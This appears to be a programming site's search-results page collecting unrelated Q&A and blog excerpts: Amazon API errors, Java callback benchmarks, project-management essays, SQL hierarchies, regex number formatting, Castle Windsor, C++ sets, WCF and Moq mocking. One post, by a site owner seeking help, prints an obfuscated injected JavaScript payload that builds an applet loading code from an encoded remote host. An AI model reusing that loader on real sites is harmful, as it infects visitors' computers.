Search Results

Search found 708 results on 29 pages for 'steven potter'.

Page 27/29 | < Previous Page | 23 24 25 26 27 28 29  | Next Page >

  • Amazone API ItemSearch returns (400) Bad Request.

    - by BuzzBubba
    I'm using a simple example from Amazon documentation for ItemSearch and I get a strange error: "The remote server returned an unexpected response: (400) Bad Request." This is the code: public static void Main() { //Remember to create an instance of the amazon service, including you Access ID. AWSECommerceServicePortTypeClient service = new AWSECommerceServicePortTypeClient(new BasicHttpBinding(), new EndpointAddress( "http://webservices.amazon.com/onca/soap?Service=AWSECommerceService")); AWSECommerceServicePortTypeClient client = new AWSECommerceServicePortTypeClient( new BasicHttpBinding(), new EndpointAddress("http://webservices.amazon.com/onca/soap?Service=AWSECommerceService")); // prepare an ItemSearch request ItemSearchRequest request = new ItemSearchRequest(); request.SearchIndex = "Books"; request.Title = "Harry+Potter"; request.ResponseGroup = new string[] { "Small" }; ItemSearch itemSearch = new ItemSearch(); itemSearch.Request = new ItemSearchRequest[] { request }; itemSearch.AWSAccessKeyId = accessKeyId; // issue the ItemSearch request try { ItemSearchResponse response = client.ItemSearch(itemSearch); // write out the results foreach (var item in response.Items[0].Item) { Console.WriteLine(item.ItemAttributes.Title); } } catch(Exception e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(e.Message); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("Press any key to quit..."); Clipboard.SetText(e.Message); } Console.ReadKey(); What is wrong?

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • Null-free "maps": Is a callback solution slower than tryGet()?

    - by David Moles
    In comments to "How to implement List, Set, and Map in null free design?", Steven Sudit and I got into a discussion about using a callback, with handlers for "found" and "not found" situations, vs. a tryGet() method, taking an out parameter and returning a boolean indicating whether the out parameter had been populated. Steven maintained that the callback approach was more complex and almost certain to be slower; I maintained that the complexity was no greater and the performance at worst the same. But code speaks louder than words, so I thought I'd implement both and see what I got. The original question was fairly theoretical with regard to language ("And for argument sake, let's say this language don't even have null") -- I've used Java here because that's what I've got handy. Java doesn't have out parameters, but it doesn't have first-class functions either, so style-wise, it should suck equally for both approaches. (Digression: As far as complexity goes: I like the callback design because it inherently forces the user of the API to handle both cases, whereas the tryGet() design requires callers to perform their own boilerplate conditional check, which they could forget or get wrong. But having now implemented both, I can see why the tryGet() design looks simpler, at least in the short term.) First, the callback example: class CallbackMap<K, V> { private final Map<K, V> backingMap; public CallbackMap(Map<K, V> backingMap) { this.backingMap = backingMap; } void lookup(K key, Callback<K, V> handler) { V val = backingMap.get(key); if (val == null) { handler.handleMissing(key); } else { handler.handleFound(key, val); } } } interface Callback<K, V> { void handleFound(K key, V value); void handleMissing(K key); } class CallbackExample { private final Map<String, String> map; private final List<String> found; private final List<String> missing; private Callback<String, String> handler; public CallbackExample(Map<String, String> map) { this.map = map; found = new ArrayList<String>(map.size()); missing = new ArrayList<String>(map.size()); handler = new Callback<String, String>() { public void handleFound(String key, String value) { found.add(key + ": " + value); } public void handleMissing(String key) { missing.add(key); } }; } void test() { CallbackMap<String, String> cbMap = new CallbackMap<String, String>(map); for (int i = 0, count = map.size(); i < count; i++) { String key = "key" + i; cbMap.lookup(key, handler); } System.out.println(found.size() + " found"); System.out.println(missing.size() + " missing"); } } Now, the tryGet() example -- as best I understand the pattern (and I might well be wrong): class TryGetMap<K, V> { private final Map<K, V> backingMap; public TryGetMap(Map<K, V> backingMap) { this.backingMap = backingMap; } boolean tryGet(K key, OutParameter<V> valueParam) { V val = backingMap.get(key); if (val == null) { return false; } valueParam.value = val; return true; } } class OutParameter<V> { V value; } class TryGetExample { private final Map<String, String> map; private final List<String> found; private final List<String> missing; public TryGetExample(Map<String, String> map) { this.map = map; found = new ArrayList<String>(map.size()); missing = new ArrayList<String>(map.size()); } void test() { TryGetMap<String, String> tgMap = new TryGetMap<String, String>(map); for (int i = 0, count = map.size(); i < count; i++) { String key = "key" + i; OutParameter<String> out = new OutParameter<String>(); if (tgMap.tryGet(key, out)) { found.add(key + ": " + out.value); } else { missing.add(key); } } System.out.println(found.size() + " found"); System.out.println(missing.size() + " missing"); } } And finally, the performance test code: public static void main(String[] args) { int size = 200000; Map<String, String> map = new HashMap<String, String>(); for (int i = 0; i < size; i++) { String val = (i % 5 == 0) ? null : "value" + i; map.put("key" + i, val); } long totalCallback = 0; long totalTryGet = 0; int iterations = 20; for (int i = 0; i < iterations; i++) { { TryGetExample tryGet = new TryGetExample(map); long tryGetStart = System.currentTimeMillis(); tryGet.test(); totalTryGet += (System.currentTimeMillis() - tryGetStart); } System.gc(); { CallbackExample callback = new CallbackExample(map); long callbackStart = System.currentTimeMillis(); callback.test(); totalCallback += (System.currentTimeMillis() - callbackStart); } System.gc(); } System.out.println("Avg. callback: " + (totalCallback / iterations)); System.out.println("Avg. tryGet(): " + (totalTryGet / iterations)); } On my first attempt, I got 50% worse performance for callback than for tryGet(), which really surprised me. But, on a hunch, I added some garbage collection, and the performance penalty vanished. This fits with my instinct, which is that we're basically talking about taking the same number of method calls, conditional checks, etc. and rearranging them. But then, I wrote the code, so I might well have written a suboptimal or subconsicously penalized tryGet() implementation. Thoughts?

    Read the article

  • Death March

    - by Nick Harrison
    It is a horrible sight to watch a project fail. There are few things as bad. Watching a project fail regardless of the reason is almost like sitting in a room with a "Dementor" from Harry Potter. It will literally suck all of the life and joy out of the room. Nearly every project that I have seen fail has failed because of political challenges or management challenges. Sometimes there are technical challenges that bring a project to its knees, but usually projects fail for less technical reasons. Here a few observations about projects failing for political reasons. Both the client and the consultants have to be committed to seeing the project succeed. Put simply, you cannot solve a problem when the primary stake holders do not truly want it solved. This could come from a consultant being more interested in extended the engagement. It could come from a client being afraid of what will happen to them once the problem is solved. It could come from disenfranchised stake holders. Sometimes a project is beset on all sides. When you find yourself working on a project that has this kind of threat, do all that you can to constrain the disruptive influences of the bad apples. If their influence cannot be constrained, you truly have no choice but to move on to a new project. Tough choices have to be made to make a project successful. These choices will affect everyone involved in the project. These choices may involve users not getting a change request through that they want. Developers may not get to use the tools that they want. Everyone may have to put in more hours that they originally planned. Steps may be skipped. Compromises will be made, but if everyone stays committed to the end goal, you can still be successful. If individuals start feeling disgruntled or resentful of the compromises reached, the project can easily be derailed. When everyone is not working towards a common goal, it is like driving with one foot on the break and one foot on the accelerator. Not only will you not get to where you are planning, you will also damage the car and possibly the passengers as well.   It is important to always keep the end result in mind. Regardless of the development methodology being followed, the end goal is not comprehensive documentation. In all cases, it is working software. Comprehensive documentation is nice but useless if the software doesn't work.   You can never get so distracted by the next goal that you fail to meet the current goal. Most projects are ultimately marathons. This means that the pace must be sustainable. Regardless of the temptations, you cannot burn the team alive. Processes will fail. Technology will get outdated. Requirements will change, but your people will adapt and learn and grow. If everyone on the team from the most senior analyst to the most junior recruit trusts and respects each other, there is no challenge that they cannot overcome. When everyone involved faces challenges with the attitude "This is my project and I will not let it fail" "You are my teammate and I will not let you fail", you will in fact not fail. When you find a team that embraces this attitude, protect it at all cost. Edward Yourdon wrote a book called Death March. In it, he included a graph for categorizing Death March project types based on the Happiness of the Team and the Chances of Success.   Chances are we have all worked on Death March projects. We will all most likely work on more Death March projects in the future. To a certain extent, they seem to be inevitable, but they should never be suicide or ugly. Ideally, they can all be "Mission Impossible" where everyone works hard, has fun, and knows that there is good chance that they will succeed. If you are ever lucky enough to work on such a project, you will know that sense of pride that comes from the eventual success. You will recognize a profound bond with the team that you worked with. Chances are it will change your life or at least your outlook on life. If you have not already read this book, get a copy and study it closely. It will help you survive and make the most out of your next Death March project.

    Read the article

  • Challenge 19 – An Explanation of a Query

    - by Dave Ballantyne
    I have received a number of requests for an explanation of my winning query of TSQL Challenge 19. This involved traversing a hierarchy of employees and rolling a count of orders from subordinates up to superiors. The first concept I shall address is the hierarchyId , which is constructed within the CTE called cteTree.   cteTree is a recursive cte that will expand the parent-child hierarchy of the personnel in the table @emp.  One useful feature with a recursive cte is that data can be ‘passed’ from the parent to the child data.  The hierarchyId column is similar to the hierarchyId data type that was introduced in SQL Server 2008 and represents the position of the person within the organisation. Let us start with a simplistic example Albert manages Bob and Eddie.  Bob manages Carl and Dave. The hierarchyId will represent each person’s position in this relationship in a single field.  In this simple example we could append the userID together into a varchar field as detailed below. This will enable us to select a branch of the tree by filtering using Where hierarchyId  ‘1,2%’ to select Bob and all his subordinates.  Naturally, this is not comprehensive enough to provide a full solution, but as opposed to concatenating the Id’s together into a varchar datatyped column, we can apply the same theory to a varbinary.  By CASTing the ID’s into a datatype of varbinary(4) ,4 is used as 4 bytes of data are used to store an integer and building a hierarchyId  from those.  For example: The important point to bear in mind for later in the query is that the binary data generated is 'byte order comparable'. ie We can ORDER a dataset with it and the resulting data, will be in the order required. Now, would probably be a good time to download the example file and, after the cte ‘cteTree’, uncomment the line ‘select * from cteTree’.  Mark this and all prior code and execute.  This will show you how this theory directly relates to the actual challenge data.  The only deviation from the above, is that instead of using the ID of an employee, I have used the row_number() ranking function to order each level by LastName,Firstname.  This enables me to order by the HierarchyId in the final result set so that the result set is in the required order. Your output should be something like the below.  Notice also the ‘Level’ Column that contains the depth that the employee is within the tree.  I would encourage you to ‘play’ with the query, change the order in the row_number() or the length of the cast in the hierarchyId to see how that effects the outcome.  The next cte, ‘cteTreeWithOrderCount’, is a join between cteTree and the @ord table, and COUNT’s the number of orders per employee.  A LEFT JOIN is employed here to account for the occasion where an employee has made no sales.   Executing a ‘Select * from cteTreeWithOrderCount’ will return the result set as below.  The order here is unimportant as this is only a staging point of the data and only the final result set in a cte chain needs an Order by clause, unless TOP is utilised. cteExplode joins the above result set to the tally table (Nums) for Level Occurances.  So, if level is 2 then 2 rows are required.  This is done to expand the dataset, to create a new column (PathInc), which is the (n+1) integers contained within the heirarchyid.  For example, with the data for Robert King as given above, the below 3 rows will be returned. From this you can see that the pathinc column now contains the values for Andrew Fuller and Steven Buchanan who are Robert King’s superiors within the tree.    Finally cteSumUp, sums the orders for each person and their subordinates using the PathInc generated above, and the final select does the final simple mathematics and filters to restrict the result set to only the ‘original’ row per employee.

    Read the article

  • Regular Expressions Cookbook Is in The Money—Win a Copy

    - by Jan Goyvaerts
    %COOKBOOKFRAME%You may have heard some people say that most book authors never get any royalties. That’s not true because most authors get an advance royalty that is paid before the book is published. That’s the author’s main incentive for writing the book, at least as far as money is concerned. (If money is your main concern, don’t write books.) What is true is that most authors never see any money beyond the advance royalty. Royalty rates are very low. A 10% royalty of the publisher’s price is considered normal. The publisher’s price is usually 45% of the retail price. So if you pay full price in a bookstore, the author gets 4.5% of your money. If there’s more than one author, they split the royalty. It doesn’t take a math degree to figure out that a book needs to sell quite a few copies for the royalty to add up to a meaningful amount of money. But Steven and I must have done something right. Regular Expressions Cookbook is in the money. My royalty statement for the 3rd quartier of 2009, which is the 2nd quarter that the book was on the market, came with a check. I actually received it last month but didn’t get around to blogging about. The amount of the check is insignificant. The point is that the balance is no longer negative. I’m taking this opportunity to pat myself and my co-author on the back. To celebrate the occassion O’Reilly has offered to sponsor a give-away of five (5) copies of Regular Expressions Cookbook. These are the rules of the game: You must post a comment to this blog article including your actual name and actual email address. Names are published, email addresses are not. Comments are moderated by myself (Jan Goyvaerts). If I consider a comment to be offensive or spam it will not be published and not be eligible for any prize. If you don’t know what to say in the comment, just wish me a happy 100000nd birthday, so I don’t have to feel so bad about entering the 6-bit era. Each person commenting has only one chance to win, regardless of the number of comments posted. O’Reilly will be provided with the names and email addresses of the winners (and those email addresses only) in order to arrange delivery. Each winner can choose to receive a printed copy or ebook (DRM-free PDF). If you choose the printed book, O’Reilly pays for shipping to anywhere in the world but not for any duties or taxes your country may impose on books imported from the USA. If you choose the ebook, you’ll need to create an O’Reilly account that is then granted access to the PDF download. You can make your choice after you’ve won, so it doesn’t influence your chance of winning. Contest ends 28 February 2010, GMT+7 (Thai time). Chosen by five calls to Random(78)+1 in Delphi 2010, the winners are: 48: Xiaozu 45: David Chisholm 19: Miquel Burns 33: Aaron Rice 17: David Laing Thanks to everybody who participated. The winners have been notified by email on how to collect their prize.

    Read the article

  • #MIX Day 2 Keynote: Put the Phone Down and Listen

    - by andrewbrust
    MIX day 1’s keynote was all about Windows Phone 7 (WP7).  MIX day 2’s was a reminder that Microsoft has much more going on than a new mobile platform.  Steven Sinofsky, Scott Guthrie, Doug Purdy and others showed us lots of other good things coming from Microsoft, mostly in the developer stack, that we certainly shouldn’t overlook.  These included the forthcoming IE9, its new JavaScript compiling engine and support for HTML 5 that takes full advantage of the local PC resources, including the Graphics Processing Unit.  The announcements also included important additions to ASP.NET (and one subtraction, in the form of lighter-weight ViewState technology) including almost-obsessive jQuery support.  That support is so good that John Resig, creator of the jQuery project, came on stage to tell us so.  Then Scott Guthrie told us that Microsoft would be contributing code to Open Source jQuery project. This is not your father’s Microsoft, it would seem. But to me, the crown jewel in today’s keynote were the numerous announcements around the Open Data Protocol (OData).  OData is nothing more than the protocol side of “Astoria” (now known as WCF Data Services, and until recently called ADO.NET Data Services) separated out and opened up as a platform-neutral standard.  The 2009 Professional Developers Conference (PDC) was Microsoft’s vehicle for first announcing OData, as well as project “Dallas,” an Azure-based cloud platform for publishing commercial OData feeds.  And we had already known about “bridges” for Astoria (and thus OData) for PHP and Java.  We also knew that PowerPivot, Microsoft’s forthcoming self-service BI plug-in for Excel 2010, will consume OData feeds and then facilitate drill-down analysis of their data.  And we recently found out that SQL Reporting Services reports (in the forthcoming SQL Server 2008 R2) and SharePoint 2010 lists will be consumable in OData format as well. So what was left to announce?  How about OData clients for Palm webOS and Apple iPhone/Objective C?  How about the release to Open Source of .NET’s OData client?  Or the ability to publish any SQL Azure database as an OData service by simply checking a checkbox at deployment?  Maybe even a Silverlight tool (code-named “Houston”) to create SQL Azure databases (and then publish them as OData) right in the browser?  And what if you you could get at NetFlix’s entire catalog in OData format?  You can – just go to http://odata.netflix.com/Catalog/ and see for yourself.  Douglas Purdy, who made these announcements said “we want OData to work on as many devices and platforms as possible.”  After all the cross-platform OData announcements made in about a half year’s time, it’s hard to dispute this. When Microsoft plays the data card, and plays it well, watch out, because data programmability is the company’s heritage.  I’ll be discussing OData at length in my April Redmond Review column.  I wrote that column two weeks ago, and was convinced then that OData was a big deal. Today upped the ante even more.  And following the Windows Phone 7 euphoria of yesterday was, I think, smart timing.  The phone, if it’s successful, will be because it’s a good developer platform play.  And developer platforms (as well as their creators) are most successful when they have a good data strategy.  OData is very Silverlight-friendly, and that means it’s WP7-friendly too.  Phone plus service-oriented data is a one-two punch.  A phone platform without data would have been a phone with no signal.

    Read the article

  • ArchBeat Link-o-Rama Top 10 for December 9-15, 2012

    - by Bob Rhubart
    You click, we listen. The following list reflects the Top 10 most popular items posted on the OTN ArchBeat Facefbook page for the week of December 9-15, 2012. DevOps Basics II: What is Listening on Open Ports and Files – WebLogic Essentials | Dr. Frank Munz "Can you easily find out which WebLogic servers are listening to which port numbers and addresses?" asks Dr. Frank Munz. The good doctor has an answer—and a tech tip. Using OBIEE against Transactional Schemas Part 4: Complex Dimensions | Stewart Bryson "Another important entity for reporting in the Customer Tracking application is the Contact entity," says Stewart Bryson. "At first glance, it might seem that we should simply build another dimension called Dim – Contact, and use analyses to combine our Customer and Contact dimensions along with our Activity fact table to analyze Customer and Contact behavior." SOA 11g Technology Adapters – ECID Propagation | Greg Mally "Many SOA Suite 11g deployments include the use of the technology adapters for various activities including integration with FTP, database, and files to name a few," says Oracle Fusion Middleware A-Team member Greg Mally. "Although the integrations with these adapters are easy and feature rich, there can be some challenges from the operations perspective." Greg's post focuses on technical tips for dealing with one of these challenges. Podcast: DevOps and Continuous Integration In Part 1 of a 3-part program, panelists Tim Hall (Senior Director of product management for Oracle Enterprise Repository and Oracle’s Application Integration Architecture), Robert Wunderlich (Principal Product Manager for Oracle’s Application Integration Architecture Foundation Pack) and Peter Belknap (Director of product management for Oracle SOA Integration) discuss why DevOps matters and how it changes development methodologies and organizational structure. Good To Know - Conflicting View Objects and Shared Entity | Andrejus Baranovskis Oracle ACE Director Andrejus Baranovskis shares his thoughts -- and a sample application -- dealing with an "interesting ADF behavior" encountered over the weekend. Cloud Deployment Models | B. R. Clouse Looking out for the cloud newbies... "As the cloud paradigm grows in depth and breadth, more readers are approaching the topic for the first time, or from a new perspective," says B. R. Clouse. "This blog is a basic review of cloud deployment models, to help orient newcomers and neophytes." Service governance morphs into cloud API management | David Linthicum "When building and using clouds, the ability to manage APIs or services is the single most important item you can provide to ensure the success of the project," says David Linthicum. "But most organizations driving a cloud project for the first time have no experience handling a service-based architecture and don't see the need for API management until after deployment. By then, it's too late." Oracle Fusion Middleware Security: Password Policy in OAM 11g R2 | Rob Otto Rob Otto continues the Oracle Fusion Middleware A-Team "Oracle Access Manager Academy" series with a detailed look at OAM's ability to support "a subset of password management processes without the need to use Oracle Identity Manager and LDAP Sync." Understanding the JSF Lifecycle and ADF Optimized Lifecycle | Steven Davelaar Could you call that a surprise ending? Oracle WebCenter & ADF Architecture Team (A-Team) member learned a lot more than he expected while creating a UKOUG presentation entitled "What you need to know about JSF to be succesful with ADF." Expanding on requestaudit - Tracing who is doing what...and for how long | Kyle Hatlestad "One of the most helpful tracing sections in WebCenter Content (and one that is on by default) is the requestaudit tracing," says Oracle Fusion Middleware A-Team architect Kyle Hatlestad. Get up close and technical in his post. Thought for the Day "There is no code so big, twisted, or complex that maintenance can't make it worse." — Gerald Weinberg Source: SoftwareQuotes.com

    Read the article

  • Additional new material WebLogic Community

    - by JuergenKress
    Virtual Developer Conference On Demand - Register Updated Book: WebLogic 12c: Distinctive Recipes - Architecture, Development, Administration by Oracle ACE Director Frank Munz - Blog | YouTube Webcast: Migrating from GlassFish to WebLogic - Replay Reliance Commercial Finance Accelerates Time-to-Market, Improves IT Staff Productivity by 70% - Blog | Oracle Magazine Retrieving WebLogic Server Name and Port in ADF Application by Andrejus Baranovskis, Oracle Ace Director - Blog Using Oracle WebLogic 12c with NetBeans IDEOracle ACE Director Markus Eisele walks you through installing and configuring all the necessary components, and helps you get started with a simple Hello World project. Read the article. Video: Oracle A-Team ADF Mobile Persistence SampleThis video by Oracle Fusion Middleware A-Team architect Steven Davelaar demonstrates how to use the ADF Mobile Persistence Sample JDeveloper extension to generate a fully functional ADF Mobile application that reads and writes data using an ADF BC SOAP web service. Watch the video. Java ME 8 ReleaseDownload Java ME today! This release is an implementation of the Java ME 8 standards JSR 360 (CLDC 8) and JSR 361 (MEEP 8), and includes support of alignment with Java SE 8 language features and APIs, an enhanced services-enabled application platform, the ability to "right-size" the platform to address a wide range of target devices, and more. Learn more Download Java ME SDK 8It includes application development support for Oracle Java ME Embedded 8 platforms and includes plugins for NetBeans 8. See the Java ME 8 Developer Tools Documentation to learn JavaOne 2014 Early Bird RateRegister early to save $400 off the onsite price. With the release of Java 8 this year, we have exciting new sessions and an interactive demo space! NetBeans IDE 8.0 Patch UpdateThe NetBeans Team has released a patch for NetBeans IDE 8.0. Download it today to get fixes that enhance stability and performance. Java 8 Questions ForumFor any questions about this new release, please join the conversation on the Java 8 Questions Forum. Java ME 8: Getting Started with Samples and Demo CodeLearn in few steps how to get started with Java ME 8! The New Java SE 8 FeaturesJava SE 8 introduces enhancements such as lambda expressions that enable you to write more concise yet readable code, better utilize multicore systems, and detect more errors at compile time. See What's New in JDK 8 and the new Java SE 8 documentation portal. Pay Less for Java-Related Books!Save 20% on all new Oracle Press books related to Java. Download the free preview sampler for the Java 8 book written by Herbert Schildt, Maurice Naftain, Henrik Ebbers and J.F. DiMarzio. New book: EJB 3 in Action, Second Edition WebLogic 12c Does WebSockets Getting Started by C2B2 Video: Building Robots with Java Embedded Video: Nighthacking TV Watch presentations by Stephen Chin and community members about Java SE, Java Embedded, Java EE, Hadoop, Robots and more. Migrating the Spring Pet Clinic to Java EE 7 Trip report : Jozi JUG Java Day in Johannesburg How to Build GlassFish 4 from Source 4,000 posts later : The Aquarium WebLogic Partner Community For regular information become a member in the WebLogic Partner Community please visit: http://www.oracle.com/partners/goto/wls-emea ( OPN account required). If you need support with your account please contact the Oracle Partner Business Center. Blog Twitter LinkedIn Mix Forum Wiki Technorati Tags: WebLogic,WebLogic Community,Oracle,OPN,Jürgen Kress

    Read the article

  • Class design issue

    - by user2865206
    I'm new to OOP and a lot of times I become stumped in situations similar to this example: Task: Generate an XML document that contains information about a person. Assume the information is readily available in a database. Here is an example of the structure: <Person> <Name>John Doe</Name> <Age>21</Age> <Address> <Street>100 Main St.</Street> <City>Sylvania</City> <State>OH</State> </Address> <Relatives> <Parents> <Mother> <Name>Jane Doe</Name> </Mother> <Father> <Name>John Doe Sr.</Name> </Father> </Parents> <Siblings> <Brother> <Name>Jeff Doe</Name> </Brother> <Brother> <Name>Steven Doe</Name> </Brother> </Siblings> </Relatives> </Person> Ok lets create a class for each tag (ie: Person, Name, Age, Address) Lets assume each class is only responsible for itself and the elements directly contained Each class will know (have defined by default) the classes that are directly contained within them Each class will have a process() function that will add itself and its childeren to the XML document we are creating When a child is drawn, as in the previous line, we will have them call process() as well Now we are in a recursive loop where each object draws their childeren until all are drawn But what if only some of the tags need to be drawn, and the rest are optional? Some are optional based on if the data exists (if we have it, we must draw it), and some are optional based on the preferences of the user generating the document How do we make sure each object has the data it needs to draw itself and it's childeren? We can pass down a massive array through every object, but that seems shitty doesnt it? We could have each object query the database for it, but thats a lot of queries, and how does it know what it's query is? What if we want to get rid of a tag later? There is no way to reference them. I've been thinking about this for 20 hours now. I feel like I am misunderstanding a design principle or am just approaching this all wrong. How would you go about programming something like this? I suppose this problem could apply to any senario where there are classes that create other classes, but the classes created need information to run. How do I get the information to them in a way that doesn't seem fucky? Thanks for all of your time, this has been kicking my ass.

    Read the article

  • Mocking HttpContext in .NET MVC2 using Moq

    - by Richard
    Hi, This was working in MVC 1, but has broken in MVC 2. I'm mocking the HttpContext so I can test routes. The code was originally taken from Steven Sanderson's book. I've tried mocking some extra properties as suggested in this comment but it hasn't fixed it. What am I missing? This is the start of my test code. routeData is null when this code completes. // Arange RouteCollection routeConfig = new RouteCollection(); MvcApplication.RegisterRoutes(routeConfig); var mockHttpContext = makeMockHttpContext(url); // Act RouteData routeData = routeConfig.GetRouteData(mockHttpContext.Object); This method creates my mock HttpContext: private static Mock<HttpContextBase> makeMockHttpContext(String url) { var mockHttpContext = new Mock<System.Web.HttpContextBase>(); // Mock the request var mockRequest = new Mock<HttpRequestBase>(); mockHttpContext.Setup(t => t.Request).Returns(mockRequest.Object); mockRequest.Setup(t => t.AppRelativeCurrentExecutionFilePath).Returns(url); // Tried adding these to fix in MVC2 (didn't work) mockRequest.Setup(r => r.HttpMethod).Returns("GET"); mockRequest.Setup(r => r.Headers).Returns(new NameValueCollection()); mockRequest.Setup(r => r.Form).Returns(new NameValueCollection()); mockRequest.Setup(r => r.QueryString).Returns(new NameValueCollection()); mockRequest.Setup(r => r.Files).Returns(new Mock<HttpFileCollectionBase>().Object); // Mock the response var mockResponse = new Mock<HttpResponseBase>(); mockHttpContext.Setup(t => t.Response).Returns(mockResponse.Object); mockResponse.Setup(t => t.ApplyAppPathModifier(It.IsAny<String>())).Returns<String>(t => t); return mockHttpContext; }

    Read the article

  • Could not find schema information for the element 'castle'.

    - by Richard77
    Hello! I'm creating a Custom tag in my web.config. I first wrote the following entry under the configSections section. <section name="castle" type="Castle.Windsor.Configuration.AppDomain.CastleSectionHandler, Castle.Windsor" /> But, when I try to create a castle node inside the configuration node as below <castle> <components> </components> </castle> I get the following error message:"*Could not find schema information for the element 'castle*'." "*Could not find schema information for the element 'components'***." Am I missing something? I can't find why. And, if I run the application anyway, I get the following error "Could not find section 'Castle' in the configuration file associated with this domain." Ps.// The sample comes from "Pro ASP.NET MVC Framework"/Steven Sanderson/APress ISBN-13 (pbk): 978-1-4302-1007-8" on page 99. Thank you for the help ============================================================ Since I believe to have done exactly what's said in the book and did not succed, I ask the same question in different terms. How do I add a new node using the above information? ============================================================================= Thank you. I did what you said and do not have the two warnings. However, I've go a big new warning: "The element 'configuration' in namespace 'MyWindsorSchema' has invalid child element 'configSections' in namespace 'MyWindsorSchema'. List of possible elements expected: 'include, properties, facilities, components' in namespace 'MyWindsorSchema'."

    Read the article

  • C++ Set Erase Entry Question

    - by Wallace
    Hi. I encountered a problem here. I'm using C++ multiset. This is the test file. Score: 3-1 Ben Steven Score: 1-0 Ben Score: 0-0 Score: 1-1 Cole Score: 1-2 Ben I'm using while loop and ifstream (fin1) to read in from the test file above. multiset<string, less<string> > myset; while(!fin1.eof()) { fin1 >> scoreName; if(scoreName == "Score:") { //calculates number of matches played } else { goalCheck = scoreName.substr(1,1); if(goalCheck == "-") { string lGoal, rGoal; lGoal = scoreName.substr(0,1); rGoal = scoreName.substr(2,1); int leftGoal, rightGoal; leftGoal = atoi(lGoal.c_str()); rightGoal = atoi(rGoal.c_str()); if(leftGoal > rightGoal) //if team wins { //some computations } else if(leftGoal < rightGoal) //if team loses { //computations } else if(leftGoal == rightGoal) //if team draws { //computations } else { myset.insert(myset.begin(), scoreName); } } } I'm inserting all names into myset (regardless of wins/loses/draws) in my last else statement. But I only require the names of those matches who won/draw. Those names whose matches lost will not be included in myset. In the test file above, there's only one match that lost (1-2) and I wanted to remove "Ben". How can I do that? I tried to use myset.erase(), but I'm not sure how to get it point to Ben and remove it from myset. Any help is much appreciated. Thanks.

    Read the article

  • c# (wcf) architecture file and directory structure (and instantiation)

    - by stevenrosscampbell
    Hello and thanks for any assistance. I have a wcf service that I'm trying to properly modularize. I'm interested in finding out if there is a better way or implementing the file and directory structure along with instanciatation, is there a more appropriate way of abstraction that I may be missing? Is this the best approach? especially if performance and the ability to handle thousands of simultanious request? Currently I have this following structure: -Root\Service.cs public class Service : IService { public void CreateCustomer(Customer customer) { CustomerService customerService = new CustomerService(); customerService.Create(customer); } public void UpdateCustomer(Customer customer) { CustomerService customerService = new CustomerService(); customerService.Update(customer); } } -Root\Customer\CustomerService.cs pulbic class CustomerService { public void Create(Customer customer) { //DO SOMETHING } public void Update(Customer customer) { //DO SOMETHING } public void Delete(int customerId) { //DO SOMETHING } public Customer Retrieve(int customerId) { //DO SOMETHING } } Note: I do not include the Customer Object or the DataAccess libraries in this example as I am only concerned about the service. If you could either let me know what you think, if you know a better way, or a resource that could help out. Thanks Kindly. Steven

    Read the article

  • Auto-converting numbers to comma-fied versions

    - by Jeff Atwood
    Given the following text /feeds/tag/remote-desktop 1320 17007 22449240 /feeds/tag/terminal-server 1328 15805 20989040 /foo/23211/test 1490 11341 16898090 Let's say we want to convert those numbers to their comma-fied forms, like so /feeds/tag/remote-desktop 1,320 17,007 22,449,240 /feeds/tag/terminal-server 1,328 15,805 20,989,040 /foo/23211/test 1,490 11,341 16,898,090 (don't worry about fixing the fixed-width ASCII spacing, that's a problem for another day) This is the best regex I could come up with; it's based on this JavaScript regex solution from Regex Ninja Steven Levithan: return Regex.Replace(s, @"\b(?<!\/)\d{4,}\b(?<!\/)", delegate(Match match) { string output = ""; string m = match.Value; int len = match.Length; for (int i = len - 1; i >= 0 ; i--) { output = m[i] + output; if ((len - i) % 3 == 0) output = "," + output; } if (output.StartsWith(",")) output = output.Substring(1, output.Length-1); return output; }); In a related question, there is a very clever number comma insertion regex proposed: text = Regex.Replace(text, @"(?<=\d)(?=(\d{3})+$)", ",") However this requires an end anchor $ which, as you can see, I don't have in the above text -- the numbers are "floating" in the rest of the text. I suspect there is a cleaner way to do this than my solution? After writing this, I just realized I could combine them, and put one Regex inside the other, like so: return Regex.Replace(s, @"\b(?<!\/)\d{4,}\b(?<!\/)", delegate(Match match) { return Regex.Replace(match.Value, @"(?<=\d)(?=(\d{3})+$)", ","); });

